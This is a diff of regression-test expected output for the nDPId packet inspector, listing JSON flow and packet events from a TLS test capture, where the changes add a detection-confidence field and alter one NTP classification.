 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1626168077735,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1626168077735,"pkt":"WNVuaKQA8BiYFWV8CABFAABCGz0AAEARjT3AqAF5CAgICP69ADUALrrFTnABAAABAAAAAAAACnRpbWUtbWFjb3MFYXBwbGUDY29tAAABAAE="}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077735,"flow_last_seen":1626168077735,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1626168077735,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00654{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1626168077749,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":193,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":193,"pkt_l4_len":159,"ts_msec":1626168077749,"pkt":"8BiYFWV8WNVuaKQACABFAACzStAAAHkRJDkICAgIwKgBeQA1\/r0An7qJTnCBgAABAAYAAAAACnRpbWUtbWFjb3MFYXBwbGUDY29tAAABAAHADAAFAAEAAAR8ABUIdGltZS1vc3gBZwdhYXBsaW1nwB3AMgABAAEAAANFAAQR\/Tb7wDIAAQABAAADRQAEEf1s\/cAyAAEAAQAAA0UABBH9bH3AMgABAAEAAANFAAQR\/TZ7wDIAAQABAAADRQAEEf02fQ=="}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"ts_msec":1626168077749,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.54.251"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"ts_msec":1626168077749,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"time-macos.apple.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.253.54.251"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1626168077750,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1626168077750,"pkt":"WNVuaKQA8BiYFWV8CABFAABMdJwAAEAR+uvAqAF5Ef02+8BAAHsAOBCpIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","ndpi": {"proto":"NTP.Apple","breed":"Safe","category":"System"},"ntp": {"request_code":0,"version":0}}
+00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168077750,"flow_last_seen":1626168077750,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1626168077750,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1626168077780,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"ts_msec":1626168077780,"pkt":"8BiYFWV8WNVuaKQACABFAABMU7FAADcR5NYR\/Tb7wKgBeQB7wEAAOB9pJAED6wAAAAAAAAALU0hNAOSX2YmMm6TtAAAAAAAAAADkl9mN1Ssd5+SX2Y3VLRfJ"}
 00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAABTEkpAADAGeM2MUnEawKgBeQG70pHkPsMTwD\/s34AYAEWx6wAAAQEICkDJEb890flmFQMDABpqQiSe8lZWsEgoTupah5UnGMUqJn8V431Q+A=="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1626168077848,"pkt":"8BiYFWV8WNVuaKQACABFAAA0EktAADAGeOuMUnEawKgBeQG70pHkPsMywD\/s34ARAEUESgAAAQEICkDJEcA90flm"}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1626168078653,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1626168078653,"pkt":"WNVuaKQA8BiYFWV8CABFAABGLVcAAEARex\/AqAF5CAgICMseADUAMgvmotEBAAABAAAAAAAAAzIzNQIzMwIyMgEyB2luLWFkZHIEYXJwYQAADAAB"}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078653,"flow_last_seen":1626168078653,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1626168078653,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"235.33.22.2.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1626168078654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1626168078654,"pkt":"WNVuaKQA8BiYFWV8CABFAABITn4AAEARWfbAqAF5CAgICMseADUANKzYlN8BAAABAAAAAAAAAjI2AzExMwI4MgMxNDAHaW4tYWRkcgRhcnBhAAAMAAE="}
-00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078653,"flow_last_seen":1626168078654,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1626168078654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"26.113.82.140.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168078653,"flow_last_seen":1626168078654,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1626168078654,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":51998,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"26.113.82.140.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1626168078673,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"flow_min_l4_payload_len":1448,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1448,"flow_avg_l4_payload_len":1448,"midstream":1,"ts_msec":1626168078673,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"52.98.163.18","src_port":53429,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2aa\/F4bv+FAQEACuIgAAFwMDCRUAAAAAAAAAWfKHBs70qmO4BAxw\/KH76VJthsd+JmhEdw9LbrjkTjI9b3XfM0DMNLKHxmQFc1wZ9+v47IezDEajRVIeCS0iuwLsGsA3YBgKp65J4M20GnYw3QEoWxPt99213+KI1CclXQzaueofFw\/qIILvmneWSh5sBJstqbtZLD2cDfq2tFoUseLZtuSKYL5M6qSNwvarEAmysHZgT7Udi\/a0Qp07Np4WgFkq\/a9MQH22ift7VaKutQa0mJmP19SdWXTILAVbvhO3J6cdL9EqjePIeIkXKca0uVG2cDnC+ogcIBgWiBVq1pQlzG6pgHKD3PRA0vNoda3MJ0atx621R\/WKvfMZJYbQztqn6MP4oCdEaJloUS59wJjijiLCZEHV1oirlnS2nC0LRIMkV0xOr2eStcvbZVXw4nOKDQS6H4Zgv11KltQC1JnlZF3H2hfUzks7VZJ1piCl7JLEyNiXPboWZlWGmZoEaDAEUa\/zJI4IEULQtYV9J4jBVG0LIyT8dLpi5cgu5HSsaKdQTef+rQO01UnLW77pUjM2FuWnb+vOmbNg9vroOAp08oUd4WURirzl+3HYtCcfBI3wOCJwEWivMjawTzc9kqNg6MLXXDVodJ+9u6ySbjGo8wdF8Ujzicfc0DHPbSwSWwzi48Lx1Xv3zlCdNcfYFQi2USvaYTxC82pbJFTcLcjA75y5d4uDzJFLRDQQPcLYiW1zyuRecgn4v\/HoR\/nQn8q3KO2aunXtZjN2Sgwqa9bCj+P70uuLOr7LdCSf95Yuvv83BVkjI8LO\/K2GelZusfiw+ph2AM5v3nVCVFtVClMHt5LBbn90AGigLyLssV8usgvMte9WY2YO5RbaLrRuaQaZXq7xKP6I9rbLNl04xmGTkSwgMCnsYgpwvWgoxVEJKIK81LOzdRyjEIzviQKsdu5zYpaTUYn0gMWLbk8gisL6HsaNyyzZRZny4WG9c8rHaQ0AVF7OZHAfugm1G0Ya+4uTEO06lH0Y0luTPeZbk6BzWyTQN4kkdYJgzbQ\/H4fL96wAxDKYsoN4xb\/dNiL+rBxozbwW3E3YDpgsLBHEYXx\/9T+ZZByNcVhoanUoyeZR4La0nznczRNl0BSSAwop3ffF\/3weBpuyebCHd3nQY06YIOyKfw5o\/8+DIvbWrrftOtndpCOAfM8xK0ncs0qGgNDeHWSGhfqOCu4xsd1D6TNFpi+SoFxZbO162qCP1uQZqSIk3sB4T700Vag3Fmr5zAc2+Cy2sdC\/A9S2zr73WQ2tNqbvUTsm7mAOCy6fHXiJfrCMOm070Q3x\/hDA1F\/ri24teJTcz681Tpyzz98or8aBXhC1tirmfRKLeb1za5S0A5FpvCOErLaYZ7JnA2Hcnep7W9VvnkzVZD\/eh5PJxQTtMHNN3t73y3SocpYzsv4jecsMhINyJMQzKIZyFN7BeOFn3Icd72v79IVYW+OEMLTFGr\/z0a3l6KHAUNHg5OrTZy63kxeuj2oqpuTuGGW5OGR1vga0lB9LeT5DNs1fw4ET+3+xHSDQYEpIQCm73rmKpEzHnGvP6PaZFc3upw\/YvkfAML3GBWjg6BeNxYGhLgBq1U7bw1AAqe3KjEtHWznkCRp0j2b1yA1x473SNIk\/Tl0OU2uF4V2zDlzbygL3UGekyceZ9TOivgWvNEFgm3JDyB1JsgPkE1UA9Mb3RcUv6IS4oUKckZLMvYCqsp6JNk+hSM2SSYrjCpjVhAAYR\/Tw9J3qPbVuQ\/+0boJNNW9SXU3FXb1mu6\/UjowIaOU5yd1Ruw2HgKAG+TcnMQdTBDCV1Fn1s2Gos7GgJFmic+wrwQmUwvry3qcM4QfQn+KkqL+DVzAfZpY3UE5kKkQw09tvvvCnUub+fKLuuHs2xshp8SgWsVHUpe\/eGalaURu9E5+S5ef5NZPTZU4="}
 01660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1626168078673,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":936,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":936,"pkt_l4_len":902,"ts_msec":1626168078673,"pkt":"WNVuaKQA8BiYFWV8CABFAgOaAABAAEAGncbAqAF5NGKjEtC1Absg2axnF4bv+FAYEAByKgAA8hiRnjTuMaDQEL+CLYj0enfAkHVnXO7nV5IzKiak6sLS6qxgDE4htK9g2bjk3R484+O\/m3LR4RiopAnWolcjfbrpfWVb1lMjRimj35IfoR0InDQcTV+lqM1hnbaRsbPul7kk7yp40mdnMbGeSdokyNlVd+Gc2o9y\/kRGCp\/RqZF8PhlnvFvIilO8yiVaTaBmaNQ2c5Ph9+sPKU5aFL1uQpdr\/lZqIfEq2kVgCrdBeDo4qNeeQzKtJNsLVSSXJNaa5EbU9xA4Gcwa59FEb+z5l5k6kMngz8ZNuAlqyaHzifpWW3O+gJvTHlQKGmobQMi8ii1K+B8azR0rME7gHuYp8j9KIa090V1eZVPAqukxBBhYGnGZkUnr+FDlf1ZK\/6jjt\/FM8rQ\/lbeUUBqVgsa+O\/WxUto3U7xUvYDA5nlmX+JiSIl7TX4qI+Ru0aN0Akmto\/YQCR\/ts7jv1DeYAK5L5Yy2Vh6PLRQ4c+Pa\/92Jj4DNdt3iyKVflpKtt14Zke3huw2c2HHz1srDVPgqGpJqA\/eD7864eDOp49Ft0Yeo1yo62XnCO2MSq34SmUewekOqz3llMeY3SFHNG\/SCIEenKOH+ZLswKCtHaL23XWktzPIAvtiPaUe8OQwJHr\/lbrWuPFkD\/U0II2V8NaPz4AVb17oDlmuZOeHOf8JZ5gjU14hPhQ0t944FAWUouPhqgHpug4J7fVHUyJ1W0HeNumJ7723SardKLRg5P7i3J2r6\/9HqflhjXWWoqO31j\/pyOLWOUftD3uTRP8P11Cr3jlNVHTXBld4hude0v33CDpTR\/mf09FhR1Yz1vcA7zHJhk+Hem4vzglb2dTx3BT6MRYPvgUON2zk99ErenQrEGfd6PyJWO5iWwsY0xU8meKY2Jp0LdAk9BxGhy3LU4uTxR4t614VXg7Le3F2XXuKmjbJsQgbVMUYhVkJ6JBcddg15aCLR+YYoWrYgjp+WThS8gLNpJaxaihLqA77pNdcaI187nN+luEpN2fsVBRr1v588oPOg6ugZIMvvQGM\/932ci9FWgh+Egtrp9jWvgwN6C+x\/6Ul9gPKwr35MQ2L88mYUnXuuDGVnTkJ6VTWgAawJ1AxcwiThWo3unPbjvr6pM+jswTV6XOO7V8+41tsMKM1s8WPQI+YtWq8fuv3wgnLtmndqFCNp"}
@@ -118,26 +118,26 @@
 02433{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1502,"pkt_l4_len":1468,"ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgXQAABAAEAGm5DAqAF5NGKjEtC1Absg2a\/ZF4bv+FAQEAAXNQAAFwMDDxEAAAAAAAAAWp5GeZKPSB7w816DdrEEqHX9aC+YviuGDPWPZX1hWzeJO56tAdFAhHB2CxgaqBUmTp67G7NpRBSOlgFCk7Rz2PSU2RjHkzQN9DEZnqJDnpBJTPsDp7SajTr4PwFG5UIWqi9zReh9EtkjrIng35h3QjPy5pgRGIggIUa\/zHocLpnIHnx2NID0uKUJhEdZqWE4pcslJgdX4YfRKdEPTj3+9rZ3sLr++gXqMzrFGQr9EQgG6\/tRgaivaU0aW0ztmvO3\/qkvcrzeXMhBZCC0bJVz2bEiKKLd+7L5\/eHqmfs1xGLoIVjqoCMrClOzLnCDeSqZPqsY8tiTWubYavu9O8jG+ez+5Hkdw5Zqb5fD9oP0Ibcl2RZkNVM95HmLc4YD76gl\/z1R4Pv\/X+\/YqfzUCuKlbPSA2rgZ1AV5JLooIc7Be\/pYYpsCuIChG0LSB3wA5uDyqmIr57tSP8OI\/758hiFPERZ62qSkcVdehrui9bd5qubE0mTze86LYcawTdiQmMEKmQRBM4+o\/tLRLdTTAHx+8vIwh6AzvixYQvN8Ez8hb+phV92bD5q6hI7M8\/JGEZPjzNU+xKD+ISfZsgEkV2kgA1pedlTeMVuH\/BZclBXFLL5qRfhqeOdjAoZ73FOd8rYWzIde9ssd7E5A+tydX+O9p3kJTnLjhtup7pO1JKqLG8qs7kj4hnoO0t81p9EOSvl36UbBJ\/\/ta9Ym0CAwPBXdG+wAoJE7kndX2G2xUen+Ixk8fIsE2mGGvoV1Us4DqJZlvb5kJ5nWps2iI9sPEuDCreKTajgn6cDATXaCOavuKfFgCBU7JO2xOSJglSq7B7a6Rdhau\/3b0GgchjkVWsL6KTcuabDbsB3hgBi88ZjqfwCY2Nb9XY\/bt2EvOKRb8ymRF+9JboUUDmnm0q\/gX\/KH1nOauqAmFBE3aLfeWKAmW\/ItfqIuivKY+YDdWjc0HTcG1YGSfVrjr6aDU6y2TemMpnTIWRCWpvy7K5WBLe5V6MFlmxWmTIqOmq2cAefJgEppNDtGK3uWqgpEtHWR7rX\/TY7ljVAdLTNKRs1CNLO9YQxubR3nk57cLpnXbrfj+v+Lj4KuWOQnGZWe\/F\/8TM6cKx8vWkZgNLvg7fWbclvvuNbfQRKs6H63c6ZScHSu30WlwdJca10PuaOw6kUS8+8NgGoTM6EEL\/iGpUGKZDRPOSrSaO1EzIgUat4tPz1jNP77yXzl++\/KXlg43EyAlQZOnRr\/NFgfM4gzLfr7lDMDA3E0lRT+v95g78gwDuwXQ7BBPnvAls+NQwZbP7V0m0BvQjEB6p0fzqeSFPDpYbzQ0ZX6GjzMOnlKuf61RRwzVqCy8gfKQUs3skC1gvLgCV41uMUPTEfGnxmlKSMMVedbAmX+sTsKmnVgrA25Xxx44Rnz4aF\/zFkDRBzvExZFLH6OXGMRXTSfsHLF31OKw0QjcHdXKZOHlLQlo\/rph7r52bcX5wKB3t7XosUhaCCO8kIb3nCkluBB+sXwJFoKumEHcqAVe9Z4M3C6DXD1eVQo5daa5wFvH9M6HZwbTveh7JVbvVN9W+ACJJ82iXxyheKmXUZCNDVrtQaESdZ59LGHrlE2HGCg9gGl6VFzZLygZFAEjriuVbNilai2NxLiYx9gUajnBWGV8FEvryyeJFk\/CE6DTkT5\/Kza\/2Cu73O0Rb9icER0MPyduoWRXyUIUkVQogDMSeWnU3q93wChqd9rGdeB4XXoIzzAE+R\/SRKrrCLHUwPWEq20rYRcseqENqusBQFpiEpsgV0CsZ5TY3+f7Z7A3Y\/FdWIGrpWpaXY666wWyBIvkxWFWygO7Vx3zPMA3tnlzCspk3L3LaW0mn2EnnX30PeY5vR3upafUEAXSo6G6QdKCFC0FARyFx\/T+JPasg5u4ToWCOaORH2gHwo="}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1626168078674,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"ts_msec":1626168078674,"pkt":"WNVuaKQA8BiYFWV8CABFAgT+AABAAEAGnGLAqAF5NGKjEtC0AbvnBmXsyo5yyVAYEACH9AAAFwMDBNEAAAAAAAAA3P9mE\/WxzRlzhJVvrME7arSt4cc4b80\/fLZ45lg2jTLN+h8OznVOp0v0YJHlvGb6zo1R0y0127nCMLhWICtDPy2FtY028GLgaBdr\/YLaP88jpPC2wcimHwfty2x4WKI+LPeYoEPRAYicmmTAxPlFzZuaf1iKs+Yu1pMdI4311+rTrqclcjjttiygU+MPtoh4rbcQQi4hllQZ9bpYWoVqJ+iSt2BigYH05vsyHmu879GAhVkohrBF89b4NLKyNAMo0\/QxqgG1rqZTGisx7FjNs8y8uxtw5iKWrSpnhwqsK8HdkzdODGF90yeLdn3CCNJgdm3aNHt1MWZ4JOUy5GzAb47y2cy051il96yYxnPjPoqHZ+sb8GqydD+Wdtw8hwTtkDW7xa7mACJTwuWOIU79l2oDnl63ylL8+JOFMkvCyqpvRSJQTp84k5efBKX3KzQjur4Xu79lO0LFF2NRDD6HkdNIzdZ6GrjQ6cfeKSx84X\/NzyeoBGfExOO\/4zYWpKYV5emN2qK2WwFz9V6yUT4FYCEpMENn4zKRUt2gX3+QJ3UggRDfQ8Atlul6XoqofW\/JfCf+PszhgtXLpc9QxVs3UVfeC+BCBsI\/evJsy+X2zvUBACJp1Cao7EAa\/un53A8cu1w+QQ\/3\/qpgFcwuebDk+bTd2XwEmQcRY5ntXb11cm+t6EgiuWMc8LtkZLW4g6Qk7C3exETENqr8qaKtA57iz69EbEaWfUTp590Cm1yhdVWnzQVccpyZRGULka\/D5PTiR6o3UCqpNAg8I43q9sRPGdaOzmk6LqC8kGMMj1N8P2DVYvcwJb3HB14BO5Blfb4kQNaSZCX81P5eekubMcrCkaYeLnnSigA4c2KBCJI0\/apWCuj0F93qKZChgzKT77EQe9PNeEwH9qa2yEnfxe42M9M\/dR+ZqezhwWXFtPpr0H\/z1rdkNoyBVAssf